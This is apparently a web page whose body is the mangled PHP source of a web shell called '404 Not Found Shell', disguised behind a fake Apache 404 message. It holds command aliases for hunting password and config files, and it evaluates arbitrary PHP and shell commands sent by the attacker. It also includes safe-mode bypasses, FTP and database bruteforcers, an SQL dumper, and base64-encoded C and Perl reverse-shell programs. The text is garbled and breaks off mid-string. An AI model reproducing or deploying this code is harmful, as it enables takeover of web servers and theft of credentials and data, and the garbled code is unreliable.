Spyware, Adware, Viruses and Malicious Codes


Not Found

The requested URL was not found on this server.


Apache Server at Port 80
"dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate .conf", "locate .pwd files" => "locate .pwd", "locate .sql files" => "locate .sql", "locate .htpasswd files" => "locate .htpasswd", "locate .bash_history files" => "locate .bash_history", "locate .mysql_history files" => "locate .mysql_history", "locate .fetchmailrc files" => "locate .fetchmailrc", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function printHeader() { if(empty($_POST[charset])) $_POST[charset] = "UTF-8"; global $color; ?> ><?=$_SERVER[HTTP_HOST]?>- 404 Not Found Shell V.<?=VERSION?>-arab47.com
> > > > > >
".$path[$i]."/"; } $charsets = array(UTF-8, Windows-1251, KOI8-R, KOI8-U, cp866); $opt_charsets = ; foreach($charsets as $item) $opt_charsets .= ; $m = array(Sec. Info=>SecInfo,Files=>FilesMan,Console=>Console,Sql=>Sql,Php=>Php,Safe mode=>SafeMode,String tools=>StringTools,Bruteforce=>Bruteforce,Network=>Network); if(!empty($GLOBALS[auth_pass])) $m[Logout] = Logout; $m[Self remove] = SelfRemove; $menu = ; foreach($m as $k => $v) $menu .= [ .$k. ]; $drives = ""; if ($GLOBALS[os] == win) { foreach( range(a,z) as $drive ) if (is_dir($drive.:\)) $drives .= [ .$drive. ] ; } echo . .
Uname User Php Hdd Cwd.($GLOBALS[os] == win? Drives:).:.substr(@php_uname(), 0, 120). [Google] [milw0rm] :.$uid. ( .$user. ) Group: .$gid. ( .$group. ) :.@phpversion(). Safe mode: .($GLOBALS[safe_mode]?ON:OFF). [ phpinfo ] Datetime: .date(Y-m-d H:i:s). :.viewSize($totalSpace). Free: .viewSize($freeSpace). (.(int)($freeSpace/$totalSpace*100).%) :.$cwd_links. .viewPermsColor($GLOBALS[cwd]). [ home ] :.$drives. Server IP: .gethostbyname($_SERVER["HTTP_HOST"]). Client IP: .$_SERVER[REMOTE_ADDR].
. .$menu.
; } function printFooter() { $is_writable = is_writable($GLOBALS[cwd])?"[ Writeable ]":"[ Not writable ]"; ?>
Change dir:
Read file:
Make dir:
Make file:
Execute:
> > Upload file:
= 1073741824) return sprintf(%1.2f, $s / 1073741824 ). GB; elseif($s >= 1048576) return sprintf(%1.2f, $s / 1048576 ) . MB; elseif($s >= 1024) return sprintf(%1.2f, $s / 1024 ) . KB; else return $s . B; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = s; elseif (($p & 0xA000) == 0xA000)$i = l; elseif (($p & 0x8000) == 0x8000)$i = -; elseif (($p & 0x6000) == 0x6000)$i = b; elseif (($p & 0x4000) == 0x4000)$i = d; elseif (($p & 0x2000) == 0x2000)$i = c; elseif (($p & 0x1000) == 0x1000)$i = p; else $i = u; $i .= (($p & 0x0100) ? r : -); $i .= (($p & 0x0080) ? w : -); $i .= (($p & 0x0040) ? (($p & 0x0800) ? s : x ) : (($p & 0x0800) ? S : -)); $i .= (($p & 0x0020) ? r : -); $i .= (($p & 0x0010) ? w : -); $i .= (($p & 0x0008) ? (($p & 0x0400) ? s : x ) : (($p & 0x0400) ? S : -)); $i .= (($p & 0x0004) ? r : -); $i .= (($p & 0x0002) ? w : -); $i .= (($p & 0x0001) ? (($p & 0x0200) ? t : x ) : (($p & 0x0200) ? T : -)); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return .perms(@fileperms($f)).; elseif (!@is_writable($f)) return .perms(@fileperms($f)).; else return .perms(@fileperms($f)).; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex(which .$p); if(!empty($path)) return $path; return false; } function actionSecInfo() { printHeader(); echo

Server security information

; function showSecParam($n, $v) { $v = trim($v); if($v) { echo .$n.: ; if(strpos($v, " ") === false) echo $v. ; else echo
.$v.
; } } showSecParam(Server software, @getenv(SERVER_SOFTWARE)); showSecParam(Disabled PHP Functions, ($GLOBALS[disable_functions])?$GLOBALS[disable_functions]:none); showSecParam(Open base dir, @ini_get(open_basedir)); showSecParam(Safe mode exec dir, @ini_get(safe_mode_exec_dir)); showSecParam(Safe mode include dir, @ini_get(safe_mode_include_dir)); showSecParam(cURL support, function_exists(curl_version)?enabled:no); $temp=array(); if(function_exists(mysql_get_client_info)) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(mssql_connect)) $temp[] = "MSSQL"; if(function_exists(pg_connect)) $temp[] = "PostgreSQL"; if(function_exists(oci_connect)) $temp[] = "Oracle"; showSecParam(Supported databases, implode(, , $temp)); echo ; if( $GLOBALS[os] == nix ) { $userful = array(gcc,lcc,cc,ld,make,php,perl,python,ruby,tar,gzip,bzip,bzip2,nc,locate,suidperl); $danger = array(kav,nod32,bdcored,uvscan,sav,drwebd,clamd,rkhunter,chkrootkit,iptables,ipfw,tripwire,shieldcc,portsentry,snort,ossec,lidsadm,tcplodg,sxid,logcheck,logwatch,sysmask,zmbscap,sawmill,wormscan,ninja); $downloaders = array(wget,fetch,lynx,links,curl,get,lwp-mirror); showSecParam(Readable /etc/passwd, @is_readable(/etc/passwd)?"yes [view]":no); showSecParam(Readable /etc/shadow, @is_readable(/etc/shadow)?"yes [view]":no); showSecParam(OS version, @file_get_contents(/proc/version)); showSecParam(Distr name, @file_get_contents(/etc/issue.net)); if(!$GLOBALS[safe_mode]) { echo ; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam(Userful, implode(, ,$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam(Danger, implode(, ,$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam(Downloaders, implode(, ,$temp)); echo ; showSecParam(Hosts, @file_get_contents(/etc/hosts)); showSecParam(HDD space, ex(df -h)); showSecParam(Mount options, @file_get_contents(/etc/fstab)); } } else { showSecParam(OS Version,ex(ver)); showSecParam(Account Settings,ex(net accounts)); showSecParam(User Accounts,ex(net user)); } echo
; printFooter(); } function actionPhp() { if( isset($_POST[ajax]) ) { $_SESSION[md5($_SERVER[HTTP_HOST]).ajax] = true; ob_start(); eval($_POST[p1]); $temp = "document.getElementById(PhpOutput).style.display=;document.getElementById(PhpOutput).innerHTML=".addcslashes(htmlspecialchars(ob_get_clean())," \")."; "; echo strlen($temp), " ", $temp; exit; } printHeader(); if( isset($_POST[p2]) && ($_POST[p2] == info) ) { echo

PHP info

; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(!body {.*}!msiU,,$tmp); $tmp = preg_replace(!a:w+ {.*}!msiU,,$tmp); $tmp = preg_replace(!h1!msiU,h2,$tmp); $tmp = preg_replace(!td, th {(.*)}!msiU,.e, .v, .h, .h th {$1},$tmp); $tmp = preg_replace(!body, td, th, h2, h2 {.*}!msiU,,$tmp); echo $tmp; echo
; } if(empty($_POST[ajax])&&!empty($_POST[p1])) $_SESSION[md5($_SERVER[HTTP_HOST]).ajax] = false; echo

Execution PHP-code

; echo send using AJAX
;
    if(!empty($_POST[p1])) {
        ob_start();
        eval($_POST[p1]);
        echo htmlspecialchars(ob_get_clean());
    }
    echo 
; printFooter(); } function actionFilesMan() { printHeader(); echo

File manager

; if(isset($_POST[p1])) { switch($_POST[p1]) { case uploadFile: if(!@move_uploaded_file($_FILES[f][tmp_name], $_FILES[f][name])) echo "Cant upload file!"; break; break; case mkdir: if(!@mkdir($_POST[p2])) echo "Cant create new dir"; break; case delete: function deleteDir($path) { $path = (substr($path,-1)==/) ? $path:$path./; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST[f])) foreach($_POST[f] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case paste: if($_SESSION[act] == copy) { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s./,$f, $d.$s./); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[f] as $f) copy_paste($_SESSION[cwd],$f, $GLOBALS[cwd]); } elseif($_SESSION[act] == move) { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s./,$f, $d.$s./); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[f] as $f) @rename($_SESSION[cwd].$f, $GLOBALS[cwd].$f); } unset($_SESSION[f]); break; default: if(!empty($_POST[p1]) && (($_POST[p1] == copy)||($_POST[p1] == move)) ) { $_SESSION[act] = @$_POST[p1]; $_SESSION[f] = @$_POST[f]; foreach($_SESSION[f] as $k => $f) $_SESSION[f][$k] = urldecode($f); $_SESSION[cwd] = @$_POST[c]; } break; } echo ; } $dirContent = @scandir(isset($_POST[c])?$_POST[c]:$GLOBALS[cwd]); if($dirContent === false) { echo Can open this folder!; return; } global $sort; $sort = array(name, 1); if(!empty($_POST[p1])) { if(preg_match(!s_([A-z]+)_(d{1})!, $_POST[p1], $match)) $sort = array($match[1], (int)$match[2]); } ?> "; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(name => $dirContent[$i], path => $GLOBALS[cwd].$dirContent[$i], modify => date(Y-m-d H:i:s,@filemtime($GLOBALS[cwd].$dirContent[$i])), perms => viewPermsColor($GLOBALS[cwd].$dirContent[$i]), size => @filesize($GLOBALS[cwd].$dirContent[$i]), owner => $ow[name]?$ow[name]:@fileowner($dirContent[$i]), group => $gr[name]?$gr[name]:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[cwd].$dirContent[$i])) $files[] = array_merge($tmp, array(type => file)); elseif(@is_link($GLOBALS[cwd].$dirContent[$i])) $links[] = array_merge($tmp, array(type => link)); elseif(@is_dir($GLOBALS[cwd].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(type => dir)); } $GLOBALS[sort] = $sort; function cmp($a, $b) { if($GLOBALS[sort][0] != size) return strcmp($a[$GLOBALS[sort][0]], $b[$GLOBALS[sort][0]])*($GLOBALS[sort][1]?1:-1); else return (($a[size] < $b[size]) ? -1 : 1)*($GLOBALS[sort][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo ; $l = $l?0:1; } ?>
NameSizeModifyOwner/GroupPermissionsActions
.htmlspecialchars($f[name]):g(FilesMan,.$f[path].);">[ .htmlspecialchars($f[name]). ])..(($f[type]==file)?viewSize($f[size]):$f[type])..$f[modify]..$f[owner]./.$f[group]..$f[perms] .R T.(($f[type]==file)? E D:).
> >  
String conversions
; $stringTools = array( Base64 encode => base64_encode, Base64 decode => base64_decode, Url encode => urlencode, Url decode => urldecode, Full urlencode => full_urlencode, md5 hash => md5, sha1 hash => sha1, crypt => crypt, CRC32 => crc32, ASCII to HEX => ascii2hex, HEX to ASCII => hex2ascii, HEX to DEC => hexdec, HEX to BIN => hex2bin, DEC to HEX => dechex, DEC to BIN => decbin, BIN to HEX => bin2hex, BIN to DEC => bindec, String to lower case => strtolower, String to upper case => strtoupper, Htmlspecialchars => htmlspecialchars, String length => strlen, ); if(empty($_POST[ajax])&&!empty($_POST[p1])) $_SESSION[md5($_SERVER[HTTP_HOST]).ajax] = false; echo "
>/> send using AJAX
";
    if(!empty($_POST[p1])) {
        if(function_exists($_POST[p1]))
        echo htmlspecialchars($_POST[p1]($_POST[p2]));
    }
    echo"
"; ?>

Search for hash:

File tools
; if( !file_exists(@$_POST[p1]) ) { echo File not exists; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[p1])); $gid = @posix_getgrgid(@fileowner($_POST[p1])); echo Name: .htmlspecialchars($_POST[p1]). Size: .(is_file($_POST[p1])?viewSize(filesize($_POST[p1])):-). Permission: .viewPermsColor($_POST[p1]). Owner/Group: .$uid[name]./.$gid[name]. ; echo Create time: .date(Y-m-d H:i:s,filectime($_POST[p1])). Access time: .date(Y-m-d H:i:s,fileatime($_POST[p1])). Modify time: .date(Y-m-d H:i:s,filemtime($_POST[p1])). ; if( empty($_POST[p2]) ) $_POST[p2] = view; if( is_file($_POST[p1]) ) $m = array(View, Highlight, Download, Hexdump, Edit, Chmod, Rename, Touch); else $m = array(Chmod, Rename, Touch); foreach($m as $v) echo .((strtolower($v)==@$_POST[p2])?[ .$v. ]:$v). ; echo ; switch($_POST[p2]) { case view: echo
;
            $fp = @fopen($_POST[p1], r);
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo 
; break; case highlight: if( is_readable($_POST[p1]) ) { echo
; $code = highlight_file($_POST[p1],true); echo str_replace(array(), array(),$code).
; } break; case chmod: if( !empty($_POST[p3]) ) { $perms = 0; for($i=strlen($_POST[p3])-1;$i>=0;--$i) $perms += (int)$_POST[p3][$i]*pow(8, (strlen($_POST[p3])-$i-1)); if(!@chmod($_POST[p1], $perms)) echo Can set permissions! ; else die(); } echo
; break; case edit: if( !is_writable($_POST[p1])) { echo File isn writeable; break; } if( !empty($_POST[p3]) ) { @file_put_contents($_POST[p1],$_POST[p3]); echo Saved! ; } echo
; break; case hexdump: $c = @file_get_contents($_POST[p1]); $n = 0; $h = array(00000000 ,,); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(%02X,ord($c[$i])). ; switch ( ord($c[$i]) ) { case 0: $h[2] .= ; break; case 9: $h[2] .= ; break; case 10: $h[2] .= ; break; case 13: $h[2] .= ; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(%08X,$i+1). ;} $h[1] .= ; $h[2] .= " "; } } echo
.$h[0].
.$h[1].
.htmlspecialchars($h[2]).
; break; case rename: if( !empty($_POST[p3]) ) { if(!@rename($_POST[p1], $_POST[p3])) echo Can rename! ; else die(); } echo
; break; case touch: if( !empty($_POST[p3]) ) { $time = strtotime($_POST[p3]); if($time) { if(@touch($_POST[p1],$time,$time)) die(); else { echo Fail!; } } else echo Bad time format!; } echo
; break; case mkfile: break; } echo
; printFooter(); } function actionSafeMode() { $temp=; ob_start(); switch($_POST[p1]) { case 1: $temp=@tempnam($test, cx); if(@copy("compress.zlib://".$_POST[p2], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo Sorry... Can open file; break; case 2: $files = glob($_POST[p2].*); if( is_array($files) ) foreach ($files as $filename) echo $filename." "; break; case 3: $ch = curl_init("file://".$_POST[p2]."x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST[p2]); break; case 5: for(;$_POST[p2] <= $_POST[p3];$_POST[p2]++) { $uid = @posix_getpwuid($_POST[p2]); if ($uid) echo join(:,$uid)." "; } break; case 6: if(!function_exists(imap_open))break; $stream = imap_open($_POST[p2], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo

Safe mode bypass

; echo Copy (read file)
Glob (list dir)
Curl (read file)
Ini_restore (read file)
Posix_getpwuid ("Read" /etc/passwd)
From
To
Imap_open (read file)
; if($temp) echo
.$temp.
; echo
; printFooter(); } function actionConsole() { if(isset($_POST[ajax])) { $_SESSION[md5($_SERVER[HTTP_HOST]).ajax] = true; ob_start(); echo "document.cf.cmd.value=; "; $temp = @iconv($_POST[charset], UTF-8, addcslashes(" $ ".$_POST[p1]." ".ex($_POST[p1])," \")); if(preg_match("!.*cds+([^;]+)$!",$_POST[p1],$match)) { if(@chdir($match[1])) { $GLOBALS[cwd] = @getcwd(); echo "document.mf.c.value=".$GLOBALS[cwd].";"; } } echo "document.cf.output.value+=".$temp.";"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), " ", $temp; exit; } printHeader(); ?> Console
send using AJAX ; echo
; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER[HTTP_HOST])]); echo bye!; } function actionSelfRemove() { printHeader(); if($_POST[p1] == yes) { if(@unlink(SELF_PATH)) die(Shell has been removed); else echo unlink error!; } echo

Suicide

Really want to remove the shell? Yes
; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST[proto]) ) { echo

Results

Type: .htmlspecialchars($_POST[proto]). Server: .htmlspecialchars($_POST[server]). ; if( $_POST[proto] == ftp ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[proto] == mysql ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.:.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[proto] == pgsql ) { function bruteForce($ip,$port,$login,$pass) { $str = "host=".$ip." port=".$port." user=".$login." password=".$pass." dbname="; $res = @pg_connect($server[0].:.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[server]); if($_POST[type] == 1) { $temp = @file(/etc/passwd); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo .htmlspecialchars($line[0]).:.htmlspecialchars($line[0]). ; } if(@$_POST[reverse]) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo .htmlspecialchars($line[0]).:.htmlspecialchars($tmp); } } } } elseif($_POST[type] == 2) { $temp = @file($_POST[dict]); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[login], $line) ) { $success++; echo .htmlspecialchars($_POST[login]).:.htmlspecialchars($line). ; } } } echo "Attempts: $attempts Success: $success
"; } echo

FTP bruteforce

. . . . . . .
Type
. . . .Server:port
Brute type
. . .
Login
Dictionary
.
; echo
; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case mysql: if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case pgsql: $host = explode(:, $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case mysql: if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case mysql: return $this->res = @mysql_query($str); break; case pgsql: return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case mysql: return @mysql_fetch_assoc($res); break; case pgsql: return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case mysql: return $this->res = @mysql_list_dbs($this->link); break; case pgsql: return $this->res = $this->query("SELECT datname FROM pg_database"); break; } return false; } function listTables() { switch($this->type) { case mysql: return $this->res = $this->query(SHOW TABLES); break; case pgsql: return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != information_schema AND table_schema != pg_catalog) or table_name = pg_user"); break; } return false; } function error() { switch($this->type) { case mysql: return @mysql_error($this->link); break; case pgsql: return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case mysql: if(function_exists(mysql_set_charset)) return @mysql_set_charset($str, $this->link); else $this->query(SET CHARSET .$str); break; case mysql: return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case mysql: $res = $this->query(SHOW CREATE TABLE `.$table.`); $create = mysql_fetch_array($res); echo $create[1]."; "; $this->query(SELECT * FROM `.$table.`); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "".@mysql_real_escape_string($v).""; $columns[] = "`".$k."`"; } echo INSERT INTO `.$table.` (.implode(", ", $columns).) VALUES (.implode(", ", $item).);." "; } break; case pgsql: $this->query(SELECT * FROM .$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "".addslashes($v).""; $columns[] = $k; } echo INSERT INTO .$table. (.implode(", ", $columns).) VALUES (.implode(", ", $item).);." "; } break; } return false; } }; $db = new DbClass($_POST[type]); if(@$_POST[p2]==download) { ob_start("ob_gzhandler", 4096); $db->connect($_POST[sql_host], $_POST[sql_login], $_POST[sql_pass], $_POST[sql_base]); $db->selectdb($_POST[sql_base]); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[tbl] as $v) $db->dump($v); exit; } printHeader(); ?>

Sql browser

> >
Type Host Login Password Database
> > > "; if(isset($_POST[sql_host])){ if($db->connect($_POST[sql_host], $_POST[sql_login], $_POST[sql_pass], $_POST[sql_base])) { switch($_POST[charset]) { case "Windows-1251": $db->setCharset(cp1251); break; case "UTF-8": $db->setCharset(utf8); break; case "KOI8-R": $db->setCharset(koi8r); break; case "KOI8-U": $db->setCharset(koi8u); break; case "cp866": $db->setCharset(cp866); break; } $db->listDbs(); echo "; } else echo $tmp; }else echo $tmp; ?>
link){ echo " "; if(!empty($_POST[sql_base])){ $db->selectdb($_POST[sql_base]); echo ""; } echo "
Tables: "; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query(SELECT COUNT(*) as n FROM .$value.)); $value = htmlspecialchars($value); echo " ".$value." (".$n[n].") "; } echo " "; if(@$_POST[p1] == select) { $_POST[p1] = query; $db->query(SELECT COUNT(*) as n FROM .$_POST[p2].); $num = $db->fetch(); $num = $num[n]; echo "".$_POST[p2]." ($num) "; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST[p3]) echo "",($i+1)," "; else echo ($i+1)," "; if($_POST[type]==pgsql) $_POST[p3] = SELECT * FROM .$_POST[p2]. LIMIT 30 OFFSET .($_POST[p3]*30); else $_POST[p3] = SELECT * FROM `.$_POST[p2].` LIMIT .($_POST[p3]*30).,30; echo " "; } if((@$_POST[p1] == query) && !empty($_POST[p3])) { $db->query(@$_POST[p3]); if($db->res !== false) { $title = false; echo ; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ; foreach($item as $key => $value) echo ; reset($item); $title=true; echo ; $line = 2; } echo ; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ; else echo ; } echo ; } echo
.$key.
null.nl2br(htmlspecialchars($value)).
; } else { echo
Error: .htmlspecialchars($db->error()).
; } } echo " "; echo "
Load file >>
"; if(@$_POST[p1] == loadfile) { $db->query("SELECT LOAD_FILE(".addslashes($_POST[p2]).") as file"); $file = $db->fetch(); echo
.htmlspecialchars($file[file]).
; } } echo
; printFooter(); } function actionNetwork() { printHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9